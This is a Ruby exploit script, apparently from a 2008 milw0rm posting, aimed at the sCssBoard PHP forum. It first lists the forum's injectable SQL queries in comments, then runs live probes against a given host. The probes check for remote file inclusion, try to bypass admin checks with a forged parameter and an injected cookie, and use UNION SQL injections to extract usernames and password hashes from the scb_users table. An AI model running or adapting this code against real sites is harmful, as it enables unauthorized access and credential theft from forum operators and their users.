706 lines
No EOL
30 KiB
Ruby
Executable file
706 lines
No EOL
30 KiB
Ruby
Executable file
#!/usr/bin/ruby
|
|
#inphex - i didnt include all of those bugs into the code,this code basicly checks if the forum is vulnerable and also exploits SQL Injection bug!
|
|
#all versions on sourceforge seem to be the same ;\ so check is beeing done on each version. - scb_ is set as default table prefix
|
|
#this forum is very very very buggy,probably there are more bugs...those SQL queries etc ive used of course can be modified
|
|
#/*
|
|
#** sCssBoard, an extremely fast and flexible CSS-based message board system
|
|
#** Copyright (CC) 2005 Elton Muuga
|
|
#**
|
|
#** This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike License.
|
|
#** To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/2.0/ or send
|
|
#** a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
|
|
#*/
|
|
|
|
#probably not all
|
|
|
|
#&act=showforum&f=1&t=3%20AND%201=0,blind sql injction
|
|
#/functions/post.php
|
|
|
|
#@mysql_query("insert into $_CON[prefix]posts (posts_main,posts_topic,posts_name,posts_body,posts_starter,posts_posted,posts_forum) values('yes','$next_topic','$topicname','$body','$uid','$currdate_time','$_GET[f]')");
|
|
# $topic_post_id = @mysql_fetch_array(@mysql_query("select posts_id from $_CON[prefix]posts where posts_main = 'yes' and posts_topic = '$next_topic'"));
|
|
# @mysql_query("update $_CON[prefix]posts set posts_topic_lastpost = '$topic_post_id[0]' where posts_main = 'yes' and posts_topic = '$next_topic'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/post.php
|
|
|
|
#@mysql_query("insert into $_CON[prefix]posts (posts_main,posts_topic,posts_body,posts_starter,posts_posted,posts_forum) values('no','$topic_details[posts_topic]','$body','$uid','$currdate_time','$_GET[f]')");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#/functions/post.php
|
|
|
|
|
|
# @mysql_query("update $_CON[prefix]posts set posts_body = '$body' where posts_id = '$_GET[p]'");
|
|
# @mysql_query("update $_CON[prefix]posts set posts_name = '$topicname' where posts_id = '$_GET[p]' and posts_main = 'yes'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/post.php
|
|
|
|
#$edited_post = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_id = '$_GET[p]'"));
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/post.php
|
|
|
|
# $quoted_post = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_id = '$_GET[q]'"))
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/showforum.php
|
|
|
|
#$get_cat = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
|
|
#$all_topics = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_main = 'yes' order by posts_topic_lastpost desc");
|
|
#$topic_query = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_main = 'yes' order by posts_topic_lastpost desc limit $start,$end");
|
|
#$num_topics = @mysql_num_rows($all_topics);
|
|
#
|
|
#while($topic_show = @mysql_fetch_array($topic_query)) {
|
|
#$total_replies_topic = @mysql_num_rows(@mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_topic = '$topic_show[posts_topic]' and posts_main = 'no
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/showtopic.php
|
|
|
|
#} else {
|
|
# if (!$_GET[deltopic]) {
|
|
# $result = mysql_query("delete from $_CON[prefix]posts where posts_id = '$_GET[del]'");
|
|
# $location_string = "&t=$_GET[t]";
|
|
# } else {
|
|
# $result = mysql_query("delete from $_CON[prefix]posts where posts_topic = '$_GET[del]'");
|
|
# }
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/showtopic.php
|
|
|
|
#} elseif ($_GET[lock]) {
|
|
#
|
|
#@mysql_query("update $_CON[prefix]posts set posts_topic_locked = '$_GET[lock]' where posts_topic = '$_GET[t]' and posts_main = 'yes'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/showtopic.php
|
|
|
|
#@mysql_query("update $_CON[prefix]posts set posts_views = posts_views + 1 where posts_topic = $_GET[t] and posts_forum = $_GET[f] and posts_main = 'yes'");
|
|
#
|
|
#$forum = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
|
|
#
|
|
#if ($ulvl < $forum[forums_p_read]) { die("<p align='center'>You are not authorized to view this topic.</p>"); }
|
|
#
|
|
#$topic_perms = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_topic = '$_GET[t]' and posts_main = 'yes'"));
|
|
#
|
|
# $posts_query = @mysql_query("select * from $_CON[prefix]posts where posts_topic = '$_GET[t]' and posts_forum = $_GET[f] and posts_main = 'yes'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/showtopic.php
|
|
|
|
|
|
#$all_replies = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_topic = $_GET[t] and posts_main = 'no'");
|
|
# $replies_query = @mysql_query("select * from $_CON[prefix]posts where posts_forum = $_GET[f] and posts_topic = $_GET[t] and posts_main = 'no' order by posts_posted asc limit $start,$end");
|
|
# $num_replies = @mysql_num_rows($all_replies);
|
|
# if ((!$_GET[level_h]) and (!$_GET[level])) {
|
|
# $users_query = mysql_query("select * from $_CON[prefix]users");
|
|
# } elseif ($_GET[level_h]) {
|
|
# $users_query = mysql_query("select * from $_CON[prefix]users where users_level >= '$_GET[level_h]'");
|
|
# echo mysql_error();
|
|
# } elseif ($_GET[level]) {
|
|
# $users_query = mysql_query("select * from $_CON[prefix]users where users_level = '$_GET[level]'");
|
|
# }
|
|
#$numposts = mysql_num_rows(mysql_query("select * from $_CON[prefix]posts where posts_starter = '$users_show[users_id]'"));
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/functions/register.php
|
|
|
|
|
|
#@mysql_query("insert into $_CON[prefix]users(users_username,users_password,users_email,users_style) values('$username','$password','$email','$_MAIN[default_style]')");
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#admin/forums.php
|
|
|
|
#} else {
|
|
#
|
|
# $done = @mysql_query("insert into $_CON[prefix]categories(category_name) values('$_POST[cat_name]')");
|
|
# if ($done == 1) {
|
|
# echo "<center><b>Category ($_POST[cat_name]) created.</b></center><br /><br />";
|
|
# echo redirect("?act=admin-forums", 1);
|
|
# } else {
|
|
# echo "<center><b>Sorry, I was unable to create the category.</b></center><br /><br />";
|
|
# }
|
|
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
#} elseif ($_GET[editcat]) {
|
|
#
|
|
# if (!$_GET[go]) {
|
|
#
|
|
#$category_2edit = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]categories where category_id = '$_GET[editcat]'"));
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
# if ($_POST[cat_name] != "") {
|
|
# $done = @mysql_query("update $_CON[prefix]categories set category_name = '$_POST[cat_name]' where category_id = '$_GET[editcat]'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
#} elseif ($_GET[delcat]) {
|
|
#
|
|
# if (!$_GET[go]) {
|
|
# $category_2del = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]categories where category_id = '$_GET[delcat]'"));
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
#@mysql_query("delete from $_CON[prefix]categories where category_id = '$_GET[delcat]'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
#//**********************************************************************
|
|
#// Begin Edit Forum
|
|
#//**********************************************************************
|
|
#
|
|
#} elseif ($_GET[editforum]) {
|
|
#
|
|
# if (!$_POST[forums_name]) {
|
|
# $forum_2edit = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = '$_GET[editforum]'"));
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
# } else {
|
|
#
|
|
# $done = @mysql_query("update $_CON[prefix]forums set forums_name = '$_POST[forums_name]', forums_category = '$_POST[forums_category]', forums_description = '$_POST[forums_desc]', forums_p_read = '$_POST[forums_p_read]', forums_p_topic = '$_POST[forums_p_topic]', forums_p_reply = '$_POST[forums_p_reply]' where forums_id = '$_GET[editforum]'");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
#} elseif ($_GET[delforum]) {
|
|
#
|
|
# if (!$go) {
|
|
#
|
|
# $forum_2del = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]forums where forums_id = '$_GET[delforum]'"));
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
# @mysql_query("delete from $_CON[prefix]posts where posts_forum = '$_GET[delforum]'");
|
|
# @mysql_query("delete from $_CON[prefix]forums where forums_id = '$_GET[delforum]'");
|
|
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#/admin/forums.php
|
|
|
|
#} elseif ($_GET[reorder]) {
|
|
#
|
|
# $cat_order = $_POST[cat_order];
|
|
# $forum_order = $_POST[forum_order];
|
|
#
|
|
# foreach($cat_order as $c_id => $c_order) {
|
|
#
|
|
# @mysql_query("update $_CON[prefix]categories set category_order = '$c_order' where category_id = '$c_id'");
|
|
#
|
|
#}
|
|
#
|
|
# foreach($forum_order as $f_id => $f_order) {
|
|
#
|
|
# @mysql_query("update $_CON[prefix]forums set forums_order = '$f_order' where forums_id = '$f_id'");
|
|
#
|
|
# }
|
|
# echo redirect("?act=admin-forums");
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#if ($board_name) {
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[board_name]' where setting_name = 'board_name'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[allow_signups]' where setting_name = 'allow_signups'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[cookie_url]' where setting_name = 'cookie_url'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[cookie_path]' where setting_name = 'cookie_path'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[redir_method]' where setting_name = 'redir_method'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[sig_bbcode]' where setting_name = 'sig_bbcode'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[debug_level]' where setting_name = 'debug_level'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[date_format]' where setting_name = 'date_format'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[default_style]' where setting_name = 'default_style'");
|
|
# @mysql_query("update $_CON[prefix]settings set setting_value = '$_POST[use_relative_dates]' where setting_name = 'use_relative_dates'");
|
|
# echo "<center><b>Settings saved.</b></center><br /><br />";
|
|
# echo redirect("?act=admin-general", 1);
|
|
|
|
|
|
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
#########################################################################################################
|
|
|
|
#old version
|
|
#if($_GET[setcookie]) {
|
|
# $checkagain = mysql_fetch_array(mysql_query("select * from $_CON[prefix]users where users_username = '$_GET[u]' and users_password = '$_GET[p]'"));
|
|
# echo mysql_error();
|
|
# if ($_GET[r] == 1) {
|
|
# setcookie("sCssBoard",$checkagain[users_password],time()+2592000,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
|
|
# } else {
|
|
# setcookie("sCssBoard",$checkagain[users_password],0,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
|
|
# }
|
|
#}
|
|
require 'open-uri'
|
|
require 'net/http'
|
|
require 'net/https'
|
|
require 'base64'
|
|
require 'irb'
|
|
require 'uri'
|
|
#Session Hijacking
|
|
#} elseif ($_GET[act] == "logout") {
|
|
# echo "<p align='center'>";
|
|
# if(!$current_user) {
|
|
# echo "You cannot log out, because you are not logged in.";
|
|
# } else {
|
|
# setcookie("scb_uid",0,time()-2592000,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
|
|
# setcookie("scb_ident",0,time()-2592000,"$_MAIN[cookie_path]","$_MAIN[cookie_url]");
|
|
# echo "Logged out successfully.";
|
|
# echo redirect("index.php");
|
|
# }
|
|
# echo "</p><br />";
|
|
#########################################################################################################
|
|
# $body = $_POST[body];
|
|
#if($body == "") {
|
|
# echo "<p align='center' style='background-color:#fff; color:#333; padding:10px;'>Error: The post was left blank. <a href='javascript:history.back()'>Back...</a></p>";
|
|
# } else {
|
|
# $topic_details = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]posts where posts_forum = '$_GET[f]' and posts_topic = '$_GET[t]' and posts_main = 'yes'"));
|
|
x = 0
|
|
|
|
|
|
cmd_n = { "-h" => "host","-p" => "path"}
|
|
cmd_v = {}
|
|
set = {}
|
|
puts "usage: rub -h host.com -p /path/"
|
|
ARGV.each do |a|
|
|
x += 1
|
|
cmd_n.each do |l,v|
|
|
if a == l
|
|
cmd_v[v] = ARGV[x]
|
|
end
|
|
end
|
|
end
|
|
class Pwnag
|
|
r_g = 0
|
|
m_g = 0
|
|
def initialize(host,path,version) #let's start PWNZIN'
|
|
puts "-Going through sCssBoard Version: #{version}\n"
|
|
puts "-Checking php.ini settings\n"
|
|
|
|
req = General.new()
|
|
con = req.request(host,path+"index.php?&act=xxx&inc_function=registerglobalson-'S","")
|
|
|
|
if con =~ /registerglobalson/ then
|
|
puts "-register_globals = ON\n"
|
|
r_g = 1
|
|
else
|
|
puts "-register_globals = OFF\n"
|
|
r_g = 0
|
|
end
|
|
|
|
if con=~/registerglobalson-'S/
|
|
puts "-magic_quotes_gpc = OFF\n"
|
|
m_g = 0
|
|
else
|
|
puts "-magic_quotes_gpc = ON\n"
|
|
m_g = 1
|
|
end
|
|
|
|
|
|
req = General.new()
|
|
con = req.request(host,path+"index.php?act=profile&u='union%20select%2032498394829,32982890280927337,1,1,1,1,1,1,1,1,1,1'","")
|
|
|
|
|
|
if con=~/32982890280927337/ then
|
|
puts "-magic_quotes_gpc = OFF\n"
|
|
m_g = 0
|
|
else
|
|
puts "-magic_quotes_gpc = ON\n"
|
|
m_g = 1
|
|
end
|
|
if r_g == 1 && m_g == 0
|
|
puts "-Excellent,very very easy to exploit"
|
|
else if r_g == 0 && m_g == 1
|
|
puts "-Bad luck,hard to exploit"
|
|
else if r_g == 0 && m_g == 0
|
|
puts "-Quite easy to exploit"
|
|
else if r_g == 1 && m_g == 1
|
|
puts "-Yo,quite easy"
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
req.exploit_shit(host,path,version)
|
|
|
|
end
|
|
end
|
|
class Ownstance
|
|
version = "1.1"
|
|
supported = ["1.0","1.11","1.12"]
|
|
con = ""
|
|
def initialize(set)
|
|
unless set[:host] or set[:path] != nil
|
|
puts "HTTP Host/path?"
|
|
exit
|
|
|
|
end
|
|
end
|
|
def checkversion(host,path)
|
|
req = General.new()
|
|
con = req.request(host,path,"")
|
|
|
|
if con=~/sCssBoard<\/a> 1.12/ then
|
|
version = 1.12
|
|
else if con =~/sCssBoard<\/a> 1.11/ then
|
|
version = 1.11
|
|
else if con=~/sCssBoard<\/a> 1.0/ then
|
|
version = 1.0
|
|
else
|
|
version = "unknown"
|
|
end
|
|
end
|
|
end
|
|
pwn = Pwnag.new(host,path,version)
|
|
end
|
|
end
|
|
|
|
class General
|
|
tb_prefix = "scb_"
|
|
a_pb = nil
|
|
def exploit_shit(host,path,version)
|
|
puts "-Trying to exploit sCssBoard #{version}\n"
|
|
|
|
if version == 1.12
|
|
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
|
|
version_112_1(host,path)
|
|
puts "-------------------END FILE INCLUSION BUGS-------------------"
|
|
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
|
|
version_112_2(host,path)
|
|
version_112_6(host,path)
|
|
puts "-------------------END AUTHENTICATION Bugs-------------------"
|
|
puts "-------------------Starting to check for SQL Injection bugs-------------------" #there are more possible
|
|
version_112_3(host,path)
|
|
version_112_4(host,path)
|
|
version_112_5(host,path)
|
|
version_112_7(host,path)
|
|
puts "-------------------END SQL Injection-------------------"
|
|
else if version == 1.11
|
|
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
|
|
version_112_1(host,path)
|
|
puts "-------------------END FILE INCLUSION BUGS-------------------"
|
|
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
|
|
version_112_2(host,path)
|
|
version_112_6(host,path)
|
|
puts "-------------------END AUTHENTICATION Bugs-------------------"
|
|
puts "-------------------Starting to check for SQL Injection bugs-------------------"
|
|
version_112_3(host,path)
|
|
version_112_4(host,path)
|
|
version_112_5(host,path)
|
|
version_112_7(host,path)
|
|
puts "-------------------END SQL Injection-------------------"
|
|
else if version == 1.0
|
|
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
|
|
version_112_1(host,path)
|
|
puts "-------------------END FILE INCLUSION BUGS-------------------"
|
|
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
|
|
version_112_2(host,path)
|
|
version_112_6(host,path)
|
|
puts "-------------------END AUTHENTICATION Bugs-------------------"
|
|
puts "-------------------Starting to check for SQL Injection bugs-------------------"
|
|
version_112_3(host,path)
|
|
version_112_4(host,path)
|
|
version_112_5(host,path)
|
|
version_112_7(host,path)
|
|
else
|
|
puts "-------------------Checking for FILE INCLUSION Bugs-------------------"
|
|
version_112_1(host,path)
|
|
puts "-------------------END FILE INCLUSION BUGS-------------------"
|
|
puts "-------------------Checking for AUTHENTICATION Bugs-------------------"
|
|
version_112_2(host,path)
|
|
version_112_6(host,path)
|
|
puts "-------------------END AUTHENTICATION Bugs-------------------"
|
|
puts "-------------------Starting to check for SQL Injection bugs-------------------"
|
|
version_112_3(host,path)
|
|
version_112_4(host,path)
|
|
version_112_5(host,path)
|
|
version_112_7(host,path)
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
|
|
def version_112_1(host,path)
|
|
#########################################################################################################
|
|
#$functions = array (
|
|
# "home" => "functions/main.php",
|
|
# "register" => "functions/register.php",
|
|
# "login" => "functions/loginlogout.php",
|
|
# "logout" => "functions/loginlogout.php",
|
|
# "profile" => "functions/profile.php",
|
|
# "post" => "functions/post.php",
|
|
# "users" => "functions/users.php",
|
|
# "search" => "functions/search.php",
|
|
# "search-results" => "functions/searchresults.php",
|
|
# "showforum" => "_showforum",
|
|
# //--------------------
|
|
# "admin-home" => "admin/main.php",
|
|
# "admin-general" => "admin/general.php",
|
|
# "admin-forums" => "admin/forums.php"
|
|
# );
|
|
|
|
#foreach ($functions as $func => $address) {
|
|
# if ($act == $func) {
|
|
# $inc_function = $address;
|
|
# break;
|
|
# }
|
|
#}
|
|
#
|
|
#if ($inc_function == "_showforum") {
|
|
# if ($_GET[t] == "") {
|
|
# $inc_function = "functions/showforum.php";
|
|
# } else {
|
|
# $inc_function = "functions/showtopic.php";
|
|
# }
|
|
#}
|
|
#if ($inc_function) {
|
|
# include($inc_function); //probably rfi,lfi
|
|
#} else {
|
|
# include("functions/main.php");
|
|
#}
|
|
######################################################################################################### -
|
|
con = request(host,path+"index.php?&act=xxxxxxx&inc_function=http://shellpathownmeinph","")
|
|
|
|
if con =~/URL file-access is disabled/ #automaticly means that inc_function has been given
|
|
puts "URL File-access = OFF\n"
|
|
end
|
|
|
|
if con=~/shellpathownmeinph/
|
|
puts "This forum is vulnerable to RFI/LFI/RCE... ->index.php?&act=xxxxxxx&inc_function=shell\n"
|
|
end
|
|
|
|
end
|
|
|
|
def version_112_2(host,path)
|
|
#########################################################################################################
|
|
#if ($current_user[users_level] < 3) {
|
|
# die("Insufficient access level.");
|
|
#}
|
|
# if($_GET[update] == "now") {
|
|
# if (($current_user[users_level] < 3) and ($_GET[u] != $_COOKIE[scb_uid])) {
|
|
# die("You do not have the necessary permissions to modify this profile.");
|
|
# }
|
|
|
|
#########################################################################################################
|
|
con = request(host,path+"admin/forums.php?current_user[users_level]=4","")
|
|
|
|
if con=~/Insufficient access level/
|
|
|
|
else
|
|
puts "This forum is vulnerable to AUTH_BYPASS,$current_user[users_level] -> host/path/admin/forums.php?current_user[users_level]=4"
|
|
end
|
|
end
|
|
|
|
def version_112_3(host,path)
|
|
#########################################################################################################
|
|
#if ($_GET[viewcat]) {
|
|
#$category_query = mysql_query("select * from $_CON[prefix]categories where category_id = '$_GET[viewcat]'");
|
|
#########################################################################################################
|
|
con = request(host,path+"index.php?viewcat='union%20select%201,2,32982890280927337'","")
|
|
|
|
if con=~/32982890280927337/
|
|
puts "This forum is vulnerable to SQL Injection,index.php?viewcat='sql\n"
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
def version_112_4(host,path)
|
|
#########################################################################################################
|
|
# if($_GET[f] == "") {} else {
|
|
#$forum = mysql_fetch_array(mysql_query("select * from $_CON[prefix]forums where forums_id = $_GET[f]"));
|
|
# echo mysql_error();
|
|
# if ($forum[forums_p_read] <= $ulvl) {
|
|
#$topic = mysql_fetch_array(mysql_query("select * from $_CON[prefix]posts where posts_id = $_GET[t] and posts_forum = $_GET[f] and posts_main = 'yes'"));
|
|
#########################################################################################################
|
|
con = request(host,path+"index.php?&act=showforum&f=-1%20union%20select%201,2,3,32982890280927337,5,1,1,1","")
|
|
|
|
if con=~/32982890280927337/
|
|
puts "This forum is vulnerable to SQL Injection,index.php?&act=showforum&f=-1 sql\n"
|
|
end
|
|
|
|
con = request(host,path+"index.php?&act=showforum&f=-1%20union%20select%201,2,3,users_username,5,1,1,1%20from%20scb_users","")
|
|
puts "Username:"
|
|
regex = /<title>(.*?)<\/title>/
|
|
credentials = con.scan(regex)
|
|
|
|
puts credentials[0]
|
|
|
|
con = request(host,path+"index.php?&act=showforum&f=-1%20union%20select%201,2,3,users_password,5,1,1,1%20from%20scb_users","")
|
|
puts "Password:"
|
|
regex = /<title>(.*?)<\/title>/
|
|
credentials = con.scan(regex)
|
|
|
|
puts credentials[0]
|
|
end
|
|
|
|
|
|
def version_112_5(host,path)
|
|
#no check?
|
|
#if (!$_GET[u]) {
|
|
# $user = $current_user[users_id];
|
|
#} else {
|
|
# $user = $_GET[u];
|
|
#}
|
|
#$user_details = mysql_fetch_array(mysql_query("select * from $_CON[prefix]users where users_id = '$user'"));
|
|
con = request(host,path+"index.php?act=profile&u='union%20select%2032498394829,32982890280927337,1,1,1,1,1,1,1,1,1,1'","")
|
|
|
|
if con=~/32982890280927337/
|
|
puts "This forum is vulnerable to SQL Injection,index.php?act=profile&u='sql\n"
|
|
end
|
|
|
|
end
|
|
|
|
def version_112_6(host,path)
|
|
######################################################################################################### -
|
|
#if (($_COOKIE[scb_uid]) and ($_COOKIE[scb_ident])) {
|
|
#$current_user = @mysql_fetch_array(@mysql_query("select * from $_CON[prefix]users where users_id = '$_COOKIE[scb_uid]' and users_password = '$_COOKIE[scb_ident]'"));
|
|
######################################################################################################### -
|
|
con = request(host,path+"index.php","scb_uid=1'; scb_ident='1=1")
|
|
|
|
if con=~/Logged in as/
|
|
puts "This forum is vulnerable to AUTH_BYPASS,_COOKIE -> set cookie to scb_uid=1'; scb_ident='1=1\n"
|
|
end
|
|
end
|
|
|
|
def version_112_7(host,path)
|
|
end
|
|
|
|
def request(host,path,cookie)
|
|
http = Net::HTTP.new(host, 80)
|
|
http.use_ssl = false
|
|
path = path
|
|
|
|
headers = {
|
|
'Cookie' => cookie
|
|
}
|
|
resp, data = http.get(path, headers)
|
|
return data
|
|
|
|
end
|
|
|
|
|
|
def blind_sql
|
|
puts "Lol"
|
|
end
|
|
end
|
|
|
|
set[:host] = cmd_v["host"].gsub(/http\:\/\//, "")
|
|
set[:path] = cmd_v["path"]
|
|
scss = Ownstance.new(set)
|
|
scss.checkversion(set[:host] ,set[:path])
|
|
|
|
# milw0rm.com [2008-02-18] |